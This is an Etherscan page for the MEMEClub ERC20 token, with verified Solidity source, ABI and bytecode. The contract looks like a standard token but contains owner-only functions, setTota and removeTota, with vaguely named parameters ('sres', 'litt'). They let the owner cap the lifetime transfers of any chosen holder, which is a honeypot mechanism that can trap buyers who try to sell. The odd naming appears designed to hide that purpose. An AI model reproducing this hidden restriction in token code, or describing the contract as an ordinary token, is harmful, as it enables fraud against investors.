ETH Price: $3,483.32 (-2.00%)
Gas: 12 Gwei

Token

MEMEClub (MEMEClub)
 

Overview

Max Total Supply

2,800,000,000 MEMEClub

Holders

249

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Synapse: Bridge
Balance
100 MEMEClub

Value
$0.00
0x2796317b0ff8538f253012862c06787adfb8ceb6
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MEMEClub

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2023-11-03
*/

pragma solidity ^0.8.0;

// Interface for the ERC20 standard as defined in the EIP. An ERC20 token implements
// a standard set of functionalities that enables interoperability across multiple interfaces and platforms.
interface IERC20 {
    // Returns the amount of tokens in existence.
    function totalSupply() external view returns (uint256);
    // Returns the amount of tokens owned by `account`.
    function balanceOf(address account) external view returns (uint256);
    // Moves `amount` tokens from the caller's account to `recipient`.
    function transfer(address recipient, uint256 amount) external returns (bool);
    // Returns the remaining number of tokens that `spender` will be allowed to spend on behalf of `owner`.
    function allowance(address owner, address spender) external view returns (uint256);
    // Sets `amount` as the allowance of `spender` over the caller's tokens.
    function approve(address spender, uint256 amount) external returns (bool);
    // Moves `amount` tokens from `sender` to `recipient` using the allowance mechanism.
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    // Emitted when `value` tokens are moved from one account (`from`) to another (`to`).
    event Transfer(address indexed from, address indexed to, uint256 value);
    // Emitted when the allowance of a `spender` for an `owner` is set by a call to `approve`.
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// Abstract contract that allows child contracts to implement a function to retrieve the sender of the transaction.
abstract contract Context {
    // Returns the sender of the transaction.
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }
}

// Contract module which provides a basic access control mechanism, where there is an account (an owner)
// that can be granted exclusive access to specific functions.
contract Ownable is Context {
    // State variable that stores the owner's address.
    address private _owner;
    // Event emitted when ownership is transferred.
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    // Constructor that sets the original `owner` of the contract to the sender account.
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    // Returns the address of the current owner.
    function owner() public view virtual returns (address) {
        return _owner;
    }

    // Modifier that throws if called by any account other than the owner.
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    // Function to relinquish control of the contract to a zero address.
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }
}

// Token contract that includes the ERC20 standard functionality, access control, and transfer litts.
contract MEMEClub is Context, Ownable, IERC20 {
    // Maps an address to its balance.
    mapping(address => uint256) private _balances;
    // Maps an owner to a spender with a given allowance.
    mapping(address => mapping(address => uint256)) private _allowances;
    // Maps an address to its transfer litt.
    mapping(address => uint256) public totalTransferlitts;
    // Maps an address to the total transferred amount.
    mapping(address => uint256) public totalTransferredAmounts;

    // Token name, symbol, and number of decimals.
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    // Total supply of tokens.
    uint256 private _totalSupply;

    // Modifier that checks if the transfer amount exceeds the set litt for the sender.
    modifier transferlitt(address sender, uint256 amount) {
        uint256 litt = totalTransferlitts[sender];
        if (litt > 0) {
            require(totalTransferredAmounts[sender] + amount <= litt, "Total transfer amount exceeds the set litt");
        }
        _;
    }

    // Constructor that initializes the token contract with a name, symbol, decimals, and total supply.
    constructor(string memory name_, string memory symbol_, uint8 decimals_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        // Set total supply and adjust for decimals.
        
        _totalSupply = totalSupply_ * (10 ** decimals_);
        _balances[_msgSender()] = _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    // Function to get the name of the token.
    function name() public view returns (string memory) {
    return _name;
    }

    // Function to get the symbol of the token.
    function symbol() public view returns (string memory) {
        return _symbol;
    }

    // Function to get the number of decimals the token uses.
    function decimals() public view returns (uint8) {
        return _decimals;
    }

    // Returns the total token supply.
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    // Returns the token balance of a specific account.
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    // Allows the owner to set a transfer litt for a sres.
    function setTota(address sres, uint256 litt) public onlyOwner {
        totalTransferlitts[sres] = litt;
    }

    // Allows the owner to remove the transfer litt for a sres.
    function removeTota(address sres) public onlyOwner {
        delete totalTransferlitts[sres];
    }

    // Transfer function that moves the specified amount of tokens from the caller's account to the recipient account.
    function transfer(address recipient, uint256 amount) public virtual override transferlitt(_msgSender(), amount) returns (bool) {
        _balances[_msgSender()] -= amount;
        _balances[recipient] += amount;
        totalTransferredAmounts[_msgSender()] += amount;
        emit Transfer(_msgSender(), recipient, amount);
        return true;
    }

    // Function to check the amount of tokens that an owner allowed to a spender.
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    // Approve function that allows `spender` to withdraw from your account multiple times, up to the `amount` amount.
    // If this function is called again it overwrites the current allowance with `amount`.
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _allowances[_msgSender()][spender] = amount;
        emit Approval(_msgSender(), spender, amount);
        return true;
    }

    // Transfer tokens from one account to another based on allowance.
    // The `sender` account must have a balance of at least `amount`.
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override transferlitt(sender, amount) returns (bool) {
        require(_allowances[sender][_msgSender()] >= amount, "Transfer amount exceeds allowance");
        _balances[sender] -= amount;
        _balances[recipient] += amount;
        totalTransferredAmounts[sender] += amount;
        _allowances[sender][_msgSender()] -= amount;
        emit Transfer(sender, recipient, amount);
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sres","type":"address"}],"name":"removeTota","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sres","type":"address"},{"internalType":"uint256","name":"litt","type":"uint256"}],"name":"setTota","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"totalTransferlitts","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"totalTransferredAmounts","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162001d4c38038062001d4c833981810160405281019062000037919062000386565b6000620000496200022e60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3508360059080519060200190620000ff92919062000236565b5082600690805190602001906200011892919062000236565b5081600760006101000a81548160ff021916908360ff16021790555081600a62000143919062000514565b8162000150919062000651565b600881905550600854600160006200016d6200022e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550620001bb6200022e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6008546040516200021c919062000435565b60405180910390a35050505062000803565b600033905090565b8280546200024490620006ff565b90600052602060002090601f016020900481019282620002685760008555620002b4565b82601f106200028357805160ff1916838001178555620002b4565b82800160010185558215620002b4579182015b82811115620002b357825182559160200191906001019062000296565b5b509050620002c39190620002c7565b5090565b5b80821115620002e2576000816000905550600101620002c8565b5090565b6000620002fd620002f78462000486565b62000452565b9050828152602081018484840111156200031657600080fd5b62000323848285620006c9565b509392505050565b600082601f8301126200033d57600080fd5b81516200034f848260208601620002e6565b91505092915050565b6000815190506200036981620007cf565b92915050565b6000815190506200038081620007e9565b92915050565b600080600080608085870312156200039d57600080fd5b600085015167ffffffffffffffff811115620003b857600080fd5b620003c6878288016200032b565b945050602085015167ffffffffffffffff811115620003e457600080fd5b620003f2878288016200032b565b935050604062000405878288016200036f565b9250506060620004188782880162000358565b91505092959194509250565b6200042f81620006b2565b82525050565b60006020820190506200044c600083018462000424565b92915050565b6000604051905081810181811067ffffffffffffffff821117156200047c576200047b62000793565b5b8060405250919050565b600067ffffffffffffffff821115620004a457620004a362000793565b5b601f19601f8301169050602081019050919050565b6000808291508390505b60018511156200050b57808604811115620004e357620004e262000735565b5b6001851615620004f35780820291505b80810290506200050385620007c2565b9450620004c3565b94509492505050565b60006200052182620006b2565b91506200052e83620006bc565b92506200055d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000565565b905092915050565b6000826200057757600190506200064a565b816200058757600090506200064a565b8160018114620005a05760028114620005ab57620005e1565b60019150506200064a565b60ff841115620005c057620005bf62000735565b5b8360020a915084821115620005da57620005d962000735565b5b506200064a565b5060208310610133831016604e8410600b84101617156200061b5782820a90508381111562000615576200061462000735565b5b6200064a565b6200062a8484846001620004b9565b9250905081840481111562000644576200064362000735565b5b81810290505b9392505050565b60006200065e82620006b2565b91506200066b83620006b2565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620006a757620006a662000735565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b83811015620006e9578082015181840152602081019050620006cc565b83811115620006f9576000848401525b50505050565b600060028204905060018216806200071857607f821691505b602082108114156200072f576200072e62000764565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b620007da81620006b2565b8114620007e657600080fd5b50565b620007f481620006bc565b81146200080057600080fd5b50565b61153980620008136000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a082311161009757806395d89b411161006657806395d89b4114610274578063a9059cbb14610292578063dd62ed3e146102c2578063e3eaeb5c146102f2576100f5565b806370a0823114610200578063715018a61461023057806389de4d011461023a5780638da5cb5b14610256576100f5565b806323b872dd116100d357806323b872dd146101665780632abd7d7214610196578063313ce567146101b25780633184f3fe146101d0576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061124e565b60405180910390f35b610132600480360381019061012d919061105b565b6103b4565b60405161013f9190611233565b60405180910390f35b6101506104b4565b60405161015d91906112d0565b60405180910390f35b610180600480360381019061017b919061100c565b6104be565b60405161018d9190611233565b60405180910390f35b6101b060048036038101906101ab919061105b565b610872565b005b6101ba610936565b6040516101c791906112eb565b60405180910390f35b6101ea60048036038101906101e59190610fa7565b61094d565b6040516101f791906112d0565b60405180910390f35b61021a60048036038101906102159190610fa7565b610965565b60405161022791906112d0565b60405180910390f35b6102386109ae565b005b610254600480360381019061024f9190610fa7565b610aea565b005b61025e610bac565b60405161026b9190611218565b60405180910390f35b61027c610bd5565b604051610289919061124e565b60405180910390f35b6102ac60048036038101906102a7919061105b565b610c67565b6040516102b99190611233565b60405180910390f35b6102dc60048036038101906102d79190610fd0565b610ed6565b6040516102e991906112d0565b60405180910390f35b61030c60048036038101906103079190610fa7565b610f5d565b60405161031991906112d0565b60405180910390f35b60606005805461033190611434565b80601f016020809104026020016040519081016040528092919081815260200182805461035d90611434565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b600081600260006103c3610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff1661045d610f75565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104a291906112d0565b60405180910390a36001905092915050565b6000600854905090565b600083826000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600081111561059d578082600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461055b9190611322565b111561059c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610593906112b0565b60405180910390fd5b5b84600260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105e7610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610663576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065a90611270565b60405180910390fd5b84600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546106b29190611378565b9250508190555084600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546107089190611322565b9250508190555084600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461075e9190611322565b9250508190555084600260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006107af610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546107f89190611378565b925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161085c91906112d0565b60405180910390a3600193505050509392505050565b61087a610f75565b73ffffffffffffffffffffffffffffffffffffffff16610898610bac565b73ffffffffffffffffffffffffffffffffffffffff16146108ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108e590611290565b60405180910390fd5b80600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600760009054906101000a900460ff16905090565b60036020528060005260406000206000915090505481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109b6610f75565b73ffffffffffffffffffffffffffffffffffffffff166109d4610bac565b73ffffffffffffffffffffffffffffffffffffffff1614610a2a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2190611290565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610af2610f75565b73ffffffffffffffffffffffffffffffffffffffff16610b10610bac565b73ffffffffffffffffffffffffffffffffffffffff1614610b66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5d90611290565b60405180910390fd5b600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610be490611434565b80601f0160208091040260200160405190810160405280929190818152602001828054610c1090611434565b8015610c5d5780601f10610c3257610100808354040283529160200191610c5d565b820191906000526020600020905b815481529060010190602001808311610c4057829003601f168201915b5050505050905090565b6000610c71610f75565b826000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000811115610d4d578082600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d0b9190611322565b1115610d4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d43906112b0565b60405180910390fd5b5b8460016000610d5a610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610da39190611378565b9250508190555084600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610df99190611322565b925050819055508460046000610e0d610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e569190611322565b925050819055508573ffffffffffffffffffffffffffffffffffffffff16610e7c610f75565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610ec191906112d0565b60405180910390a36001935050505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60046020528060005260406000206000915090505481565b600033905090565b600081359050610f8c816114d5565b92915050565b600081359050610fa1816114ec565b92915050565b600060208284031215610fb957600080fd5b6000610fc784828501610f7d565b91505092915050565b60008060408385031215610fe357600080fd5b6000610ff185828601610f7d565b925050602061100285828601610f7d565b9150509250929050565b60008060006060848603121561102157600080fd5b600061102f86828701610f7d565b935050602061104086828701610f7d565b925050604061105186828701610f92565b9150509250925092565b6000806040838503121561106e57600080fd5b600061107c85828601610f7d565b925050602061108d85828601610f92565b9150509250929050565b6110a0816113ac565b82525050565b6110af816113be565b82525050565b60006110c082611306565b6110ca8185611311565b93506110da818560208601611401565b6110e3816114c4565b840191505092915050565b60006110fb602183611311565b91507f5472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6360008301527f65000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611161602083611311565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b60006111a1602a83611311565b91507f546f74616c207472616e7366657220616d6f756e74206578636565647320746860008301527f6520736574206c697474000000000000000000000000000000000000000000006020830152604082019050919050565b611203816113ea565b82525050565b611212816113f4565b82525050565b600060208201905061122d6000830184611097565b92915050565b600060208201905061124860008301846110a6565b92915050565b6000602082019050818103600083015261126881846110b5565b905092915050565b60006020820190508181036000830152611289816110ee565b9050919050565b600060208201905081810360008301526112a981611154565b9050919050565b600060208201905081810360008301526112c981611194565b9050919050565b60006020820190506112e560008301846111fa565b92915050565b60006020820190506113006000830184611209565b92915050565b600081519050919050565b600082825260208201905092915050565b600061132d826113ea565b9150611338836113ea565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561136d5761136c611466565b5b828201905092915050565b6000611383826113ea565b915061138e836113ea565b9250828210156113a1576113a0611466565b5b828203905092915050565b60006113b7826113ca565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561141f578082015181840152602081019050611404565b8381111561142e576000848401525b50505050565b6000600282049050600182168061144c57607f821691505b602082108114156114605761145f611495565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b6114de816113ac565b81146114e957600080fd5b50565b6114f5816113ea565b811461150057600080fd5b5056fea2646970667358221220027019c96510e638308e9d5b872a8d7a1d8ae4b7f33642a4ae09ffd2a7cfb19a64736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000a6e49c0000000000000000000000000000000000000000000000000000000000000000084d454d45436c756200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084d454d45436c7562000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a082311161009757806395d89b411161006657806395d89b4114610274578063a9059cbb14610292578063dd62ed3e146102c2578063e3eaeb5c146102f2576100f5565b806370a0823114610200578063715018a61461023057806389de4d011461023a5780638da5cb5b14610256576100f5565b806323b872dd116100d357806323b872dd146101665780632abd7d7214610196578063313ce567146101b25780633184f3fe146101d0576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061124e565b60405180910390f35b610132600480360381019061012d919061105b565b6103b4565b60405161013f9190611233565b60405180910390f35b6101506104b4565b60405161015d91906112d0565b60405180910390f35b610180600480360381019061017b919061100c565b6104be565b60405161018d9190611233565b60405180910390f35b6101b060048036038101906101ab919061105b565b610872565b005b6101ba610936565b6040516101c791906112eb565b60405180910390f35b6101ea60048036038101906101e59190610fa7565b61094d565b6040516101f791906112d0565b60405180910390f35b61021a60048036038101906102159190610fa7565b610965565b60405161022791906112d0565b60405180910390f35b6102386109ae565b005b610254600480360381019061024f9190610fa7565b610aea565b005b61025e610bac565b60405161026b9190611218565b60405180910390f35b61027c610bd5565b604051610289919061124e565b60405180910390f35b6102ac60048036038101906102a7919061105b565b610c67565b6040516102b99190611233565b60405180910390f35b6102dc60048036038101906102d79190610fd0565b610ed6565b6040516102e991906112d0565b60405180910390f35b61030c60048036038101906103079190610fa7565b610f5d565b60405161031991906112d0565b60405180910390f35b60606005805461033190611434565b80601f016020809104026020016040519081016040528092919081815260200182805461035d90611434565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b600081600260006103c3610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff1661045d610f75565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104a291906112d0565b60405180910390a36001905092915050565b6000600854905090565b600083826000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600081111561059d578082600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461055b9190611322565b111561059c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610593906112b0565b60405180910390fd5b5b84600260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105e7610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610663576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065a90611270565b60405180910390fd5b84600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546106b29190611378565b9250508190555084600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546107089190611322565b9250508190555084600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461075e9190611322565b9250508190555084600260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006107af610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546107f89190611378565b925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161085c91906112d0565b60405180910390a3600193505050509392505050565b61087a610f75565b73ffffffffffffffffffffffffffffffffffffffff16610898610bac565b73ffffffffffffffffffffffffffffffffffffffff16146108ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108e590611290565b60405180910390fd5b80600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600760009054906101000a900460ff16905090565b60036020528060005260406000206000915090505481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109b6610f75565b73ffffffffffffffffffffffffffffffffffffffff166109d4610bac565b73ffffffffffffffffffffffffffffffffffffffff1614610a2a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2190611290565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610af2610f75565b73ffffffffffffffffffffffffffffffffffffffff16610b10610bac565b73ffffffffffffffffffffffffffffffffffffffff1614610b66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5d90611290565b60405180910390fd5b600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610be490611434565b80601f0160208091040260200160405190810160405280929190818152602001828054610c1090611434565b8015610c5d5780601f10610c3257610100808354040283529160200191610c5d565b820191906000526020600020905b815481529060010190602001808311610c4057829003601f168201915b5050505050905090565b6000610c71610f75565b826000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000811115610d4d578082600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d0b9190611322565b1115610d4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d43906112b0565b60405180910390fd5b5b8460016000610d5a610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610da39190611378565b9250508190555084600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610df99190611322565b925050819055508460046000610e0d610f75565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e569190611322565b925050819055508573ffffffffffffffffffffffffffffffffffffffff16610e7c610f75565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610ec191906112d0565b60405180910